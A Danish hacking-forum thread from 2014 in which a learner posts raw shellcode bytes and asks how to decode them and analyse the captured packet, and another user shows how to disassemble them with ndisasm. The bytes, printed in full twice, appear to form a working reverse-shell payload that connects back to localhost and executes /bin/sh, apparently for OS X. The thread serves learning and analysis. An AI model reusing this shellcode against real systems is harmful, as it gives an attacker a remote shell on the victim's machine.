Reverse Payload
|
19-02-2014, 19:35
(Denne besked var sidst ændret: 19-02-2014, 20:59 af Spagnum.)
|
|||
|
|||
Reverse Payload
Jeg beklager på forhånd begrebsforvirring i denne beskrivelse. Ret mig gerne hvis der er noget jeg har helt galt fat i.
Der er mange områder jeg endnu ikke hjemme i endnu, men arbejder på sagen. Anyhow, lad os sige at jeg genere pakke med en payload, og sender denne til en anden client på mit netværk. Payloaden kunne så således ud: Kode: \x68\x7f\x00\x00\x01\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53\x50\xb0\x3b\xcd\x80 http://securityweekly.com/2011/10/python...-code.html 1. Kan man ud fra payloaden alene "dekryptere" shellcoden? 2. Pakken bliver opfanget og kan analyseres i Wireshark - Er der her nogen mulighed for at finde ydligere oplysninger om hvad Shellcoden indeholde og har til formål? (Mit bud her ville værer Follow TCP/UDP stream på den omtalte pakke)
Don't learn to hack, hack to learn
|
|||
19-02-2014, 20:52
|
|||
|
|||
RE: Reverse Payload
Her er en disassembling af dit payload:
Kode: 00000000 687F000001 push dword 0x100007f Så er det jo bare at læse, tegne og forstå hvad der sker. Hvis man opfanger den, så kan man læse den. Men afhængig af sårbarheden kan den være meget svær at læse. format string vulns. f.eks. er ganske ubehagelige at læse payloads fra. |
|||
19-02-2014, 21:05
|
|||
|
|||
RE: Reverse Payload
Hvordan disassemblede du det?
Igen, jeg beklager for min uvidenhed på området. (nogle relevante links, search terms etc. er også meget velkommende)
Don't learn to hack, hack to learn
|
|||
19-02-2014, 21:20
(Denne besked var sidst ændret: 19-02-2014, 21:26 af BlimBlamBlar.)
|
|||
|
|||
RE: Reverse Payload
Så'n her:
Kode: $ python -c 'import sys; sys.stdout.write("\x68\x7f\x00\x00\x01\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53\x50\xb0\x3b\xcd\x80")' | ndisasm -b 32 - ...og så er den her tabel ret rar at have: http://docs.cs.up.ac.za/programming/asm/...calls.html Rettelse: Ok, den tabel var så ikke helt fed alligevel, for jeg kan se at det er OSX shellcode |
|||
20-02-2014, 09:25
|
|||
|
|||
RE: Reverse Payload
(19-02-2014, 21:20)BlimBlamBlar Skrev: Nice - Det var netop det jeg skulle bruge. Skal dog stadig havde læst noget mere op på tingende. Tak for hjælpen!
Don't learn to hack, hack to learn
|
|||
|
User(s) browsing this thread: 1 Gæst(er)